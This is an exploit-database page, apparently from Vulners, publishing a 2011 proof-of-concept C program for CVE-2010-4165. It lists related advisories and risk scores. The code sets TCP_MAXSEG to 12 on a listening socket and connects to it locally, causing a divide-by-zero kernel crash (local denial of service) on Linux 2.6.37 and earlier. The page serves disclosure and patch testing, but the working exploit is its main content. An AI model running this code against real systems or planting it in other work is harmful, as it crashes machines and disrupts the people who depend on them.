Linux Kernel 2.6.37 - Local Kernel Denial of Service (1)

🗓️ 02 Mar 2011 00:00:00Reported by prdelkaType

Linux Kernel 2.6.37 - Local Kernel Denial of Servic

Reporter	Title	Published	Views	Family All 92
0day.today	Linux Kernel <= 2.6.37 Local Kernel Denial of Service	2 Mar 201100:00	–	zdt
0day.today	Linux Kernel < 2.6.37-rc2 TCP_MAXSEG Kernel Panic DoS	11 Mar 201100:00	–	zdt
GithubExploit	exploits	25 May 202601:12	–	githubexploit
Circl	CVE-2010-4165	2 Mar 201100:00	–	circl
CVE	CVE-2010-4165	20 Nov 201021:00	–	cve
Cvelist	CVE-2010-4165	20 Nov 201021:00	–	cvelist
Exploit DB	Linux Kernel < 2.6.37-rc2 - 'TCP_MAXSEG' Kernel Panic (Denial of Service) (2)	10 Mar 201100:00	–	exploitdb
Oracle linux	kernel security, bug fix, and enhancement update	23 Feb 201100:00	–	oraclelinux
Oracle linux	Oracle Linux 6 Unbreakable Enterprise kernel security fix update	16 Mar 201100:00	–	oraclelinux
EUVD	EUVD-2010-4141	7 Oct 202500:30	–	euvd

/* Linux Kernel <= 2.6.37 local kernel DoS (CVE-2010-4165)
 * =======================================================
 * A divide by 0 error occurs in tcp_select_initial_window
 * when processing user supplied TCP_MAXSEG facilitating a
 * local denial-of-service condition (kernel oops!) in all
 * Linux Kernel 2.6.x branch (2.6.37 & below). This issue 
 * can be triggered easily with a call to setsockopt() on 
 * a listening network socket and then establishing a TCP
 * connection to the awaiting socket. 
 * 
 * -- prdelka
 *
 */
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netinet/tcp.h>


int main() {
	int optval, optlen, ret, sd, sd2, pid;
	char *host = "localhost";	
	struct sockaddr_in locAddr;
	struct sockaddr_in servAddr;
	struct sockaddr_in dstAddr;
	printf("[ Linux Kernel tcp_select_initial_window divide by 0 DoS\n");	
	sd = socket(AF_INET, SOCK_STREAM, 0);
	memset(&servAddr,0,sizeof(servAddr));
	memset(&dstAddr,0,sizeof(dstAddr));
        servAddr.sin_family = AF_INET;
        servAddr.sin_port = htons(60000);
        servAddr.sin_addr.s_addr = INADDR_ANY;
	dstAddr.sin_family = AF_INET;
	inet_aton("127.0.0.1", &dstAddr.sin_addr);
	dstAddr.sin_port = htons(60000);
        if((bind(sd,(struct sockaddr *)&servAddr,sizeof(struct sockaddr))) == -1){
                printf("[ Cannot bind listener service\n");
                exit(-1);
        }
	listen(sd,4);
	optval = 12;
	ret = setsockopt(sd, IPPROTO_TCP, TCP_MAXSEG, &optval, sizeof(optval));
	if(ret==0)
	{
		printf("[ System is not patched against CVE-2010-4165\n[ Goodnight, sweet prince.\n");
		int sin_size = sizeof(struct sockaddr_in);
		switch(pid = fork())
		{
			case 0:
				sd = accept(sd,(struct sockaddr *)&locAddr,&sin_size);
				sleep(3);
			default:
				sd2 = socket(AF_INET, SOCK_STREAM, 0);
				connect(sd2, (struct sockaddr *)&dstAddr, sizeof(dstAddr));
				sleep(3);
		}
	}
	printf("[ System is patched, no dreams for this prince\n");
	return 0;
}

02 Mar 2011 00:00Current

7.8High risk

Vulners AI Score7.8

CVSS 24.9

EPSS0.00197

linux kernel dos cve-2010-4165 divide by 0 tcp_select_initial_window setsockopt bind tcp connection